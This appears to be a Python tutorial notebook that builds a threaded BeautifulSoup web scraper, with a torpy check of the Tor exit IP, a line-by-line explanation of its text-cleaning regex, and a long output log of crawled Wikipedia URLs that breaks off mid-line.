!pip install torpy -U
!pip install pandas
!pip install bs4
!pip install html5lib
import requests
from bs4 import BeautifulSoup
import re
import pandas as pd
import time
from urllib.parse import urljoin
from io import StringIO
# Optional function to check your IP address before using Tor, so you can compare it with the Tor exit IP and confirm Tor is working
def check_ip():
    try:
        response = requests.get('https://ifconfig.me', timeout=10)
        print("Current IP:", response.text.strip())
    except Exception as e:
        print(f"Failed to check IP address: {e}")
def init():
    # Optional: Check IP before using Tor
    # print("IP before Tor:")
    # check_ip()
    from torpy import TorClient
    hostname = 'ifconfig.me'  # It's possible to use an onion hostname here as well
    with TorClient() as tor:
        # Choose a random guard node and create a 3-hop circuit
        with tor.create_circuit(3) as circuit:
            # Create a Tor stream to the host
            with circuit.create_stream((hostname, 80)) as stream:
                # Now we can communicate with the host
                stream.send(b'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % hostname.encode())
                recv = stream.recv(1024)
                print("IP Used by Tor:", recv.decode().strip())
    return 0
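To confirm the circuit is actually being used, a minimal sketch (my own usage example, assuming check_ip() and init() above are defined in the same session) is to print both addresses back to back:

check_ip()  # prints your direct public IP via https://ifconfig.me
init()      # prints the response fetched through the 3-hop Tor circuit; the address shown should differ from the one above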
r"[^A-Za-z0-9,;:.()?\s…'’%$\-\"“”—]+"
¶r"|(?<!\d)\%"
¶r"|\$(?!\d)"
¶r"|(?<![A-Za-z\s])-|-(?![A-Za-z\s])"
¶r"|(?<!\w)['’\"“”](?!\w)"
[^A-Za-z0-9,;:.()?\s…'’%$\-\"“”—]+

[^ ]: This denotes a negated character class, which matches any character not listed inside the brackets.
A-Za-z0-9: Matches any uppercase letter (A-Z), lowercase letter (a-z), or digit (0-9).
,;:.()?: Matches the punctuation characters comma, semicolon, colon, period, parentheses, and question mark.
\s: Matches any whitespace character (space, tab, newline, etc.).
…: Matches the ellipsis character.
'’: Matches both straight and curly apostrophes/single quotes.
%$-: Matches the percent sign %, dollar sign $, and hyphen -.
\"“”: Matches straight double quotes ", curly left double quote “, and curly right double quote ”.
—: Matches em dashes.
+: Matches one or more of the preceding elements (inside the square brackets). This part effectively removes any sequence of characters that do not match the specified characters.
Purpose: This ensures that all characters represented inside the square brackets will be retained in the scraped text.
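As a quick sanity check (an illustrative snippet of my own, not part of the scraper), the character class can be tried on its own before looking at the other alternatives:

import re

sample = "Data scraping* removes ~90% of manual effort! [source]"
# Replace runs of disallowed characters with a space, then collapse whitespace
cleaned = re.sub(r"[^A-Za-z0-9,;:.()?\s…'’%$\-\"“”—]+", ' ', sample)
print(re.sub(r'\s+', ' ', cleaned).strip())
# Characters such as *, ~, [ and ] are replaced; letters, digits, and the listed punctuation survive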
(?<!\d)\%

\%: Matches the percent sign character.
(?<!\d): An assertion that checks if the character immediately preceding the % is not a digit. If this condition is true, it will match the % sign and allow you to remove it.
Purpose: This ensures that only % signs directly associated with numeric percentages (like "50%") are retained.
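A small illustrative check (the sample sentence is my own) shows the lookbehind keeping "50%" while dropping a bare percent sign:

import re

print(re.sub(r"(?<!\d)\%", ' ', "Sales grew 50% while a bare % sign is dropped"))
# The % after 50 is preserved; the standalone % becomes a space (cleaned up later by the \s+ pass)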
\$(?!\d)

\$: Matches the dollar sign character.
(?!\d): An assertion that checks if the character immediately following the $ is not a digit. If this condition is true, it will match the $ sign and allow you to remove it.
Purpose: This ensures that only $ signs directly associated with numeric amounts (like "$100") are retained.
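The mirror-image check for the dollar sign (again, an illustrative sample of my own):

import re

print(re.sub(r"\$(?!\d)", ' ', "The fee is $100, paid in US $ dollars"))
# "$100" keeps its $; the $ not followed by a digit becomes a space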
(?<![A-Za-z\s])-|-(?![A-Za-z\s])

(?<![A-Za-z\s])-: An assertion that matches a hyphen - if it is not preceded by a letter or a space.
-(?![A-Za-z\s]): An assertion that matches a hyphen - if it is not followed by a letter or a space.
Purpose: This removes hyphens that are not part of hyphenated words, or not part of sentences where there is a space on one side of a hyphen, such as in "Short- and long-term goals are important."
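A short illustrative check (the sample strings are my own) of both hyphen alternatives:

import re

pattern = r"(?<![A-Za-z\s])-|-(?![A-Za-z\s])"
print(re.sub(pattern, ' ', "Short- and long-term goals"))  # hyphenated words and the trailing "Short-" survive
print(re.sub(pattern, ' ', "code--review 2024-08-17"))     # doubled hyphens and date separators are replaced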
(?<!\w)['’\"“”](?!\w)

['’\"“”]: Matches either a straight ' or curly ’ single quote/apostrophe, or a straight or curly double quotation mark.
(?<!\w): An assertion that matches a quote or apostrophe if it is not preceded by a word character (letters, digits, or underscore).
(?!\w): An assertion that matches a quote or apostrophe if it is not followed by a word character.
Purpose: This allows you to remove single or double quotes or apostrophes that are not part of a word or contraction.
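And a final illustrative check (my own sample) for the quote rule:

import re

pattern = r"(?<!\w)['’\"“”](?!\w)"
print(re.sub(pattern, ' ', 'It’s a "quoted" word and a stray \' mark'))
# The apostrophe in It’s and the quotes hugging "quoted" stay; the isolated ' is replaced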
# The following code uses the threading library, which can help prevent the scraper from hanging indefinitely
# on a single request.
import threading
# fetch_url performs an HTTP GET request to fetch a URL using a requests.Session object.
# The result of the request (either a response or an exception) is stored in a result list at the specified index.
# Thread Role: This function encapsulates the logic that will be run concurrently in a thread, isolating the network
# operation to prevent blocking the main execution flow.
def fetch_url(session, url, result, index, timeout_duration):
    try:
        response = session.get(url, timeout=timeout_duration)
        result[index] = response
    except Exception as e:
        result[index] = e
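Before it is wired into the full scraper below, here is a minimal illustrative use of fetch_url with a watchdog timeout (the URL and the 10-second timeout are arbitrary choices of mine, not from the article):

import threading
import requests

session = requests.Session()
result = [None]  # fetch_url stores a Response or an Exception at index 0
t = threading.Thread(target=fetch_url, args=(session, 'https://example.com', result, 0, 10))
t.start()
t.join(timeout=10)  # stop waiting after 10 seconds
if t.is_alive():
    print("Request still running after the timeout; skipping this URL.")
elif isinstance(result[0], requests.Response):
    print("Status:", result[0].status_code)
else:
    print("Request failed:", result[0])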
from bs4 import BeautifulSoup
import re

def my_scraper(tmp_url_in, scrape_timeout=40):
    tmp_text = ''
    max_retries = 3
    attempt = 0
    scraped_tables_html = ''
    response = None  # Initialize response to None
    while attempt <= max_retries:
        session = requests.Session()
        session.max_redirects = 3
        # Use a list to store the response or exception
        result = [None]
        # Start a thread to fetch the URL.
        # This line creates a new Thread object. The target argument specifies the function to run in the new
        # thread (fetch_url), and args provides the arguments to pass to this function when it starts.
        # 0: Specifies the index in the result list where the response will be stored, allowing the main thread
        # to access the result after the thread completes.
        thread = threading.Thread(target=fetch_url, args=(session, tmp_url_in, result, 0, scrape_timeout))
        thread.start()  # Executes the thread, allowing the fetch_url function to run concurrently with the main program.
        thread.join(timeout=scrape_timeout)  # Waits for the thread to complete its task, up to the specified timeout.
        if thread.is_alive():  # Checks whether the thread is still running after the timeout given to join() has elapsed.
            print(f"Scraping timed out for {tmp_url_in}. Moving to next URL.")
            thread.join()  # Waits for the thread to finish so its resources are cleaned up (join() cannot forcibly terminate it).
            attempt += 1
            time.sleep(5)
            continue  # Retry in case of a timeout
        # Get the response from the result
        response = result[0]
        if isinstance(response, requests.Response):
            if response.status_code == 200:
                if 'text/html' in response.headers.get('Content-Type', ''):
                    soup = BeautifulSoup(response.text, 'html.parser')
                    # Strip HTML tags, keeping only the text of <p> elements
                    tmp_text = ' '.join(p.get_text() for p in soup.find_all('p')).replace('\n', ' ')
                    # Decode the text to process escape sequences. If you do not use this line, backslashes may only be hidden and not removed.
                    # To ensure that the backslashes are actually removed, first explicitly decode the string characters so backslashes will be
                    # visible.
                    tmp_text = tmp_text.encode('unicode_escape').decode('unicode_escape')
                    tmp_text = re.sub(
                        r"[^A-Za-z0-9,;:.()?\s…'’%$\-\"“”—]+"  # Match unwanted characters
                        r"|(?<!\d)\%"  # Remove standalone percent signs not preceded by a digit
                        r"|\$(?!\d)"  # Remove standalone dollar signs not followed by a digit
                        r"|(?<![A-Za-z\s])-|-(?![A-Za-z\s])"  # Handle hyphens in certain contexts
                        r"|(?<!\w)['’\"“”](?!\w)",  # Handle quotes in certain contexts
                        ' ',
                        tmp_text
                    )
                    # Replace any sequence of multiple whitespace characters (spaces, tabs, newlines, etc.) with a single
                    # space and then trim leading and trailing whitespace from the string.
                    tmp_text = re.sub(r'\s+', ' ', tmp_text).strip()
                    if soup.find('table'):
                        tables_html = [str(table) for table in soup.find_all('table')]
                        scraped_tables_html = ''.join(tables_html)
                        result_message = "Scraped text and tables"
                    else:
                        result_message = "Scraped text only"
                    print(f"{result_message}: {tmp_url_in}")
                    break  # Successfully scraped, exit the loop
                else:
                    print(f"Non-HTML content type for {tmp_url_in}: {response.headers.get('Content-Type')}")
                    break
            else:
                print(f"Failed to scrape {tmp_url_in}: Status code {response.status_code}")
                break
        elif isinstance(response, requests.exceptions.RequestException):
            print(f"Failed to scrape {tmp_url_in}: {response}")
            break  # Unsuccessful connection, exit the loop
    if response is None:
        # If no response was ever received, indicate this explicitly
        print(f"Failed to scrape {tmp_url_in}: No response received.")
    return tmp_text, scraped_tables_html
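A single page can be tested in isolation before crawling a whole link set (illustrative usage of my own; the URL is just one of the pages used later):

text, tables_html = my_scraper('https://en.wikipedia.org/wiki/Web_scraping')
print(text[:200])        # first 200 characters of the cleaned paragraph text
print(len(tables_html))  # length of the concatenated <table> HTML, 0 if no tables were found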
def fetch_urls(user_urls):
    from bs4 import BeautifulSoup
    import re
    all_urls = []
    for url in user_urls:
        try:
            response = requests.get(url, timeout=30)
            soup = BeautifulSoup(response.text, "html.parser")
            for link in soup.find_all('a', href=True):
                full_url = urljoin(url, link['href'])
                all_urls.append((url, full_url))
        except Exception as e:
            print(f"Failed to fetch URLs from {url}: {e}")
            continue
    all_urls = list(set(all_urls))  # Remove any potential duplicate URLs
    return all_urls
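For example (an illustrative call of my own), fetch_urls returns a pair for every anchor discovered on the seed pages:

links = fetch_urls(['https://en.wikipedia.org/wiki/Web_scraping'])
print(len(links), "links found")
print(links[:3])  # each entry is an (original_url, discovered_url) tuple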
def write_crawl_results(user_urls):
    import re
    import pandas as pd
    tmp_pd = pd.DataFrame(columns=['original_url', 'scraped_url', 'scraped_text', 'scraped_tables'])
    init()
    all_urls = fetch_urls(user_urls)
    for original_url, scraped_url in all_urls:
        if not scraped_url.startswith(('http://', 'https://')):
            scraped_url = urljoin(original_url, scraped_url)
        scraped_text, scraped_tables = my_scraper(scraped_url)
        if scraped_text or scraped_tables:
            try:
                tmp_pd = pd.concat([tmp_pd, pd.DataFrame({
                    'original_url': [original_url],
                    'scraped_url': [scraped_url],
                    'scraped_text': [scraped_text],
                    'scraped_tables': [scraped_tables]
                })], ignore_index=True)
            except Exception as e:
                print(f"Failed to append data for {scraped_url}: {e}")
    return tmp_pd
user_provided_urls = [
    'https://en.wikipedia.org/wiki/Web_scraping',
    'https://en.wikipedia.org/wiki/Data_scraping',
    # Add more URLs as needed
]

final_data = write_crawl_results(user_provided_urls)
IP Used by Tor: HTTP/1.0 200 OK date: Sat, 17 Aug 2024 15:28:16 GMT content-type: text/plain Content-Length: 14 access-control-allow-origin: * via: 1.1 google 107.189.10.175 Scraped text and tables: https://en.wikipedia.org/wiki/Facebook,_Inc._v._Power_Ventures,_Inc. Scraped text and tables: https://en.wikipedia.org/wiki/Reuters Scraped text only: https://en.wikipedia.org/wiki/Wrapper_(data_mining) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#See_also Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-21 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#References Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-3 Scraped text and tables: https://en.wikipedia.org/wiki/Data_structures Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-30 Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use Scraped text and tables: https://en.wikipedia.org/wiki/Web_shell Scraped text and tables: https://en.wikipedia.org/w/index.php?title=Web_scraping&oldid=1240545829 Scraped text and tables: https://en.wikipedia.org/wiki/Fake_news_website Scraped text and tables: https://en.wikipedia.org/wiki/Data_collection Scraped text and tables: https://en.wikipedia.org/wiki/Help:Category Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct Scraped text only: https://pubmed.ncbi.nlm.nih.gov/23632294 Scraped text and tables: https://en.wikipedia.org/wiki/Digital_rights_management Scraped text and tables: https://en.wikipedia.org/wiki/Maritime_and_Commercial_Court_(Denmark) Scraped text and tables: https://en.wikipedia.org/wiki/Spam_Act_2003 Scraped text and tables: https://en.wikipedia.org/wiki/Special:Random Failed to scrape http://scholarship.law.berkeley.edu/btlj/vol29/iss4/16/: HTTPSConnectionPool(host='scholarship.law.berkeley.edubtlj', port=443): Max retries exceeded with url: /vol29/iss4/16/ (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x0000023AC2C01610>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed')) Scraped text and tables: https://en.wikipedia.org/wiki/Semantic_web Scraped text and tables: https://en.wikipedia.org/wiki/World_Wide_Web_Wanderer Scraped text and tables: https://en.wikipedia.org/w/index.php?title=Web_scraping&printable=yes Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#HTTP_programming Non-HTML content type for https://s3.us-west-2.amazonaws.com/research-papers-mynk/Breaking-Fraud-And-Bot-Detection-Solutions.pdf: application/pdf Non-HTML content type for https://web.archive.org/web/20161011080619/https://pdfs.semanticscholar.org/4fb4/3c5a212df751e84c3b2f8d29fabfe56c3616.pdf: application/pdf Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=1 Scraped text and tables: https://en.wikipedia.org/wiki/XHTML Scraped text and tables: https://en.wikipedia.org/wiki/Template:Data Scraped text and tables: https://en.wikipedia.org/wiki/Salesforce.com Scraped text and tables: https://web.archive.org/web/20160305025808/http://www.thefreelibrary.com/American+Airlines,+FareChase+Settle+Suit.-a0103213546 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=5 Scraped text and 
tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-1 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=10 Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_February_2011 Scraped text and tables: https://en.wikipedia.org/wiki/Application_firewall Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Computer_fraud Scraped text and tables: https://en.wikipedia.org/wiki/Privilege_escalation Scraped text and tables: https://en.wikipedia.org/wiki/ISSN_(identifier) Scraped text only: https://www.worldcat.org/issn/0148-2963 Scraped text only: https://en.wikipedia.org/wiki/Change_detection_and_notification Scraped text and tables: https://en.wikipedia.org/wiki/Cyberterrorism Scraped text and tables: https://en.wikipedia.org/wiki/Load_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#History Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Further_reading Scraped text and tables: https://en.wikipedia.org/wiki/Robustness_(computer_science) Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-8 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-2 Scraped text and tables: https://en.wikipedia.org/wiki/Special:BookSources/9781595936097 Scraped text only: https://en.wikipedia.org/wiki/Category:Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Data_lineage Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-19 Scraped text and tables: https://en.wikipedia.org/wiki/HTML Scraped text and tables: https://en.wikipedia.org/wiki/XPath Scraped text and tables: https://en.wikipedia.org/wiki/Phishing Scraped text and tables: https://en.wikipedia.org/wiki/Web_page Failed to scrape https://academic.oup.com/bib/article/15/5/788/2422275: Status code 403 Scraped text and tables: https://en.wikipedia.org/wiki/QVC Scraped text and tables: https://en.wikipedia.org/wiki/Data_cleansing Scraped text and tables: https://en.wikipedia.org/wiki/Email_spoofing Scraped text and tables: https://id.wikipedia.org/wiki/Menggali_web Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=history Scraped text only: https://en.wikipedia.org/wiki/Quotron Scraped text and tables: https://en.wikipedia.org/wiki/Wiper_(malware) Scraped text and tables: https://en.wikipedia.org/wiki/Ransomware Scraped text and tables: https://en.wikipedia.org/wiki/Rootkit Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:Verifiability Non-HTML content type for https://web.archive.org/web/20110723132015/http://www.fornova.net/documents/pblog-bna-com.pdf: application/pdf Scraped text and tables: https://en.wikipedia.org/wiki/Main_Page Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-11 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-12 Scraped text and tables: https://en.wikipedia.org/wiki/Search_engine_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Big_data Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-11 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-24 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=16 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-20 Scraped text only: 
https://doi.org/10.1016%2Fj.jbusres.2020.06.012 Scraped text and tables: https://en.wikipedia.org/wiki/Arbitrary_code_execution Scraped text and tables: https://ml.wikipedia.org/wiki/%E0%B4%A1%E0%B4%BE%E0%B4%B1%E0%B5%8D%E0%B4%B1_%E0%B4%B8%E0%B5%8D%E0%B4%95%E0%B5%8D%E0%B4%B0%E0%B4%BE%E0%B4%AA%E0%B5%8D%E0%B4%AA%E0%B4%BF%E0%B4%82%E0%B4%97%E0%B5%8D Scraped text and tables: https://en.wikipedia.org/wiki/Special:EditPage/Template:Information_security Scraped text only: https://en.wikipedia.org/wiki/Contact_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Dow_Jones_%26_Company Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Vertical_aggregation Scraped text and tables: https://en.wikipedia.org/wiki/Data_analysis Scraped text and tables: https://en.wikipedia.org/wiki/Screen_reader Scraped text and tables: https://en.wikipedia.org/wiki/Parsing Scraped text only: https://ru.wikipedia.org/wiki/%D0%92%D0%B5%D0%B1-%D1%81%D0%BA%D1%80%D0%B5%D0%B9%D0%BF%D0%B8%D0%BD%D0%B3 Scraped text and tables: https://en.wikipedia.org/wiki/Dynamic_web_page Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:File_Upload_Wizard Scraped text and tables: https://en.wikipedia.org/wiki/Data_entry_clerk Scraped text and tables: https://en.wikipedia.org/wiki/Data_(computer_science) Scraped text only: https://fr.wikipedia.org/wiki/Capture_de_donn%C3%A9es_d%27%C3%A9cran Scraped text only: https://en.wikipedia.org/wiki/Wikipedia:Contact_us Scraped text only: https://en.wikipedia.org/wiki/Special:EditPage/Data_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Help:Maintenance_template_removal Scraped text and tables: https://en.wikipedia.org/wiki/Scareware Scraped text only: https://doi.org/10.1145%2F1281192.1281287 Scraped text and tables: https://cs.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://ary.wikipedia.org/wiki/%D8%AA%D8%BA%D8%B1%D8%A7%D9%81_%D9%84%D9%88%D9%8A%D8%A8 Scraped text and tables: https://en.wikipedia.org/wiki/Internet_security Scraped text only: https://en.wikipedia.org/wiki/Database_connection Scraped text only: https://en.wikipedia.org/wiki/Special:EditPage/Template:Data Scraped text and tables: https://en.wikipedia.org/wiki/Data_steward Scraped text and tables: https://zh-yue.wikipedia.org/wiki/%E7%B6%B2%E9%A0%81%E5%88%AE%E6%96%99 Scraped text only: https://ca.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:General_disclaimer Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=6 Scraped text and tables: https://en.wikipedia.org/wiki/United_Kingdom Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-31 Scraped text only: https://en.wikipedia.org/wiki/Hdl_(identifier) Scraped text and tables: https://en.wikipedia.org/wiki/Data_type Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-19 Scraped text and tables: https://en.wikipedia.org/wiki/Data_breach Scraped text and tables: https://en.wikipedia.org/wiki/Internet_Explorer Scraped text and tables: https://en.wikipedia.org/wiki/Data_editing Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-26 Failed to scrape https://pdfs.semanticscholar.org/4fb4/3c5a212df751e84c3b2f8d29fabfe56c3616.pdf: Status code 202 Scraped text and tables: https://ja.wikipedia.org/wiki/%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B9%E3%82%AF%E3%83%AC%E3%82%A4%E3%83%94%E3%83%B3%E3%82%B0 Scraped text and tables: https://en.wikipedia.org/wiki/OpenSocial Scraped 
text only: https://www.technologyreview.com/2012/06/01/85817/a-startup-hopes-to-help-computers-understand-web-pages/ Scraped text and tables: https://en.wikipedia.org/wiki/Category:Short_description_matches_Wikidata Scraped text and tables: https://en.wikipedia.org/wiki/Document_Object_Model Scraped text and tables: https://en.wikipedia.org/wiki/ISBN_(identifier) Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=14 Scraped text and tables: https://en.wikipedia.org/wiki/CSS_sprite Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:WikiProject_Countering_systemic_bias Scraped text and tables: https://en.wikipedia.org/wiki/Data_philanthropy Failed to scrape https://www.nytimes.com/2016/05/07/your-money/jamie-dimon-wants-to-protect-you-from-innovative-start-ups.html: Status code 403 Scraped text and tables: https://en.wikipedia.org/wiki/Talk:Data_scraping Scraped text only: https://www.worldcat.org/issn/1086-3818 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#AI-powered_document_understanding Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-23 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=18 Scraped text and tables: https://en.wikipedia.org/wiki/Screen_scraping Scraped text and tables: https://en.wikipedia.org/wiki/World_Wide_Web Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=19 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-16 Scraped text and tables: https://en.wikipedia.org/wiki/Archive.today Scraped text and tables: https://en.wikipedia.org/wiki/Infostealer Scraped text and tables: https://en.wikipedia.org/wiki/DNSBL Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Spyware Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#bodyContent Scraped text and tables: https://en.wikipedia.org/wiki/History_of_the_World_Wide_Web Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-3 Scraped text and tables: https://en.wikipedia.org/wiki/Source_code Scraped text and tables: https://en.wikipedia.org/wiki/Data_farming Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:UserLogin&returnto=Web+scraping Scraped text and tables: https://en.wikipedia.org/wiki/Zombie_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Help:Category Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct Scraped text only: https://developer.wikimedia.org Scraped text and tables: https://zh.wikipedia.org/wiki/%E7%BD%91%E9%A1%B5%E6%8A%93%E5%8F%96 Scraped text and tables: https://en.wikipedia.org/wiki/Data_degradation Scraped text and tables: https://en.wikipedia.org/wiki/Chase_Bank Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:Contents Scraped text and tables: https://en.wikipedia.org/wiki/String_(computer_science) Scraped text and tables: https://en.wikipedia.org/wiki/Special:Random Scraped text and tables: https://en.wikipedia.org/wiki/Cvent,_Inc. 
Scraped text and tables: https://en.wikipedia.org/wiki/Job_wrapping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-15 Scraped text and tables: https://web.archive.org/web/20120624103316/http://www.lkshields.ie/htmdocs/publications/newsletters/update26/update26_03.htm Scraped text and tables: https://en.wikipedia.org/wiki/Category:CS1_maint:_multiple_names:_authors_list Scraped text and tables: https://en.wikipedia.org/wiki/Google Scraped text and tables: https://en.wikipedia.org/wiki/Data_munging Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_ref-4 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Screen_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#HTML_parsing Scraped text and tables: https://eu.wikipedia.org/wiki/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Teleprinter Scraped text and tables: https://en.wikipedia.org/wiki/Application_security Scraped text and tables: https://en.wikipedia.org/wiki/Personal_property Scraped text and tables: https://en.wikipedia.org/wiki/Trespass_to_chattels Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=4 Scraped text and tables: https://en.wikipedia.org/wiki/Southwest_Airlines Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_April_2023 Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-20 Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_with_unsourced_statements_from_April_2023 Failed to scrape https://www.jstor.org/action/doBasicSearch?Query=%22Data+scraping%22&acc=on&wc=on: Status code 420 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scrubbing Scraped text and tables: https://en.wikipedia.org/wiki/Portal:Current_events Scraped text and tables: https://en.wikipedia.org/wiki/Data_security Scraped text only: https://proxyway.com/guides/what-is-web-scraping Scraped text and tables: https://en.wikipedia.org/wiki/Central_processing_unit Scraped text and tables: https://en.wikipedia.org/wiki/Category:All_articles_needing_additional_references Scraped text and tables: https://en.wikipedia.org/wiki/URL Scraped text and tables: https://en.wikipedia.org/wiki/Perl Scraped text and tables: https://en.wikipedia.org/wiki/Comparison_of_feed_aggregators Scraped text and tables: https://en.wikipedia.org/wiki/Help:Referencing_for_beginners Scraped text only: https://en.wikipedia.org/wiki/Special:WhatLinksHere/Data_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-8 Scraped text and tables: https://en.wikipedia.org/wiki/Auction_sniping Scraped text and tables: https://en.wikipedia.org/wiki/Grep Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:UserLogin&returnto=Data+scraping Scraped text and tables: https://en.wikipedia.org/wiki/Telnet Scraped text and tables: https://en.wikipedia.org/wiki/Template_talk:Data Scraped text and tables: https://en.wikipedia.org/wiki/Data_loading Scraped text and tables: https://en.wikipedia.org/wiki/DOM_clobbering Scraped text and tables: https://en.wikipedia.org/wiki/Runtime_application_self-protection Scraped text and tables: https://en.wikipedia.org/wiki/Code_obfuscation Scraped text only: https://support.google.com/websearch/answer/86640?hl=en Scraped text and tables: https://en.wikipedia.org/wiki/Data_management Scraped text and tables: https://en.wikipedia.org/wiki/CAPTCHA Scraped text 
and tables: https://en.wikipedia.org/wiki/Documentation Scraped text and tables: https://en.wikipedia.org/wiki/Secure_by_default Scraped text and tables: https://en.wikipedia.org/wiki/Memory_(computers) Scraped text and tables: https://en.wikipedia.org/wiki/Data_transmission Scraped text and tables: https://en.wikipedia.org/wiki/Metadata Scraped text and tables: https://en.wikipedia.org/wiki/Defendant Scraped text and tables: https://web.archive.org/web/20020308222536/http://www.chillingeffects.org/linking/faq.cgi#QID460 Scraped text and tables: https://en.wikipedia.org/wiki/Computer_port_(hardware) Scraped text only: https://en.wikipedia.org/wiki/Program_crash Scraped text and tables: https://doi.org/10.5334%2Fdsj-2021-024 Scraped text and tables: https://en.wikipedia.org/wiki/Computer_vision Scraped text and tables: https://en.wikipedia.org/wiki/Van_Buren_v._United_States Scraped text only: https://en.wikipedia.org/wiki/Special:Search Scraped text and tables: https://en.wikipedia.org/wiki/Data_wrangling Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-4 Scraped text and tables: https://en.wikipedia.org/wiki/Data_mining Scraped text and tables: https://en.wikipedia.org/wiki/Website Scraped text and tables: https://en.wikipedia.org/wiki/United_States_Supreme_Court Failed to scrape http://www.fornova.net/documents/pblog-bna-com.pdf: Status code 404 Scraped text and tables: https://en.wikipedia.org/wiki/Supreme_Court_of_the_United_States Scraped text and tables: https://en.wikipedia.org/wiki/Investment_banking Scraped text and tables: https://en.wikipedia.org/wiki/GUI Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Methods_to_prevent_web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Copy_protection Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=12 Scraped text only: https://en.wikipedia.org/wiki/End-user Scraped text only: https://en.wikipedia.org/wiki/Category:Web_crawlers Scraped text only: https://id.wikipedia.org/wiki/Pengorekan_data Scraped text and tables: https://en.wikipedia.org/wiki/Human-readable_medium Scraped text and tables: https://en.wikipedia.org/wiki/Data_compression Scraped text and tables: https://en.wikipedia.org/wiki/Machine_learning Scraped text and tables: https://en.wikipedia.org/wiki/Category:CS1_French-language_sources_(fr) Scraped text only: https://en.wikipedia.org/wiki/Special:SpecialPages Scraped text and tables: https://en.wikipedia.org/wiki/Michael_Hanna_(judge) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-30 Scraped text and tables: https://en.wikipedia.org/wiki/Time_bomb_(software) Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:Community_portal Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-25 Scraped text and tables: 